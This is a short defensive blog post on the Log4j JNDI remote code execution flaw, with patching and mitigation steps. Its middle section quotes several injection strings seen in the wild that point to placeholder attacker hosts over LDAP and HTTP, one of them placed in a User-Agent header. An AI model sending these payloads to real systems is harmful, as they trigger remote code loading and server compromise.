TL:DR

Apply vendor recommended patch updates released within the last few days

Content:

Until last Friday I was not familiar with Apache Log4j but I have learned that it makes use of Java Naming and Directory Interface (JNDI) to distribute java applications to lookup services in an abstract, resource-dependent way. The issue is that JNDI was built for efficiency and with minimal security measures in place. This means that Log4j's JNDI support allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.

Microsoft blogged that they observed a bulk of website fingerprint for vulnerable sites using this string

${jndi:ldap://[attacker site]/a}

CloudFlare blogged that they see an increase in vulnerable server reconnaissance using this string

${jndi:ldap://x.x.x.x/#Touch}

followed by a browser specific attack

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

The one that surprised me the most is the non-encrypted request to port 443 (which is supposed to be secure) and they were successful.

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}

So now that we know it is actively being exploited in the wild what can we do to secure ourselves?

  1. Upgrade Apache Log4j to version 2.16.0 or higher published on December 13 2021

If you cannot upgrade to version 2.16.0 or higher, implement these options

  • For >=2.10, set system property log4j2.formatMsgNoLookups to true.
  • For >=2.10, set environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
  • For 2.0-beta9 to 2.10.0, remove JndiLookup.class from class path: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
  • Disable JNDI,  Set up spring.jndi.ignore=true
  • Disable JNDI lookup, Set up log4j2.formatMsgNoLookups=true

2. Install a Web Application Firewall (WAF) to block malicious inbound requests

3. Block executable files from running unless they meet a prevalence, age, or trusted list criterion

4. Update your firewall signatures, most vendors have release critical updates within the last 48 hours

5. Some application vendors are also releasing critical patches so update your application

TrendMicro published a list of Indicator of Compromise that you can use to scan your environment.

Use Splunk guidance on how to search for it in your environment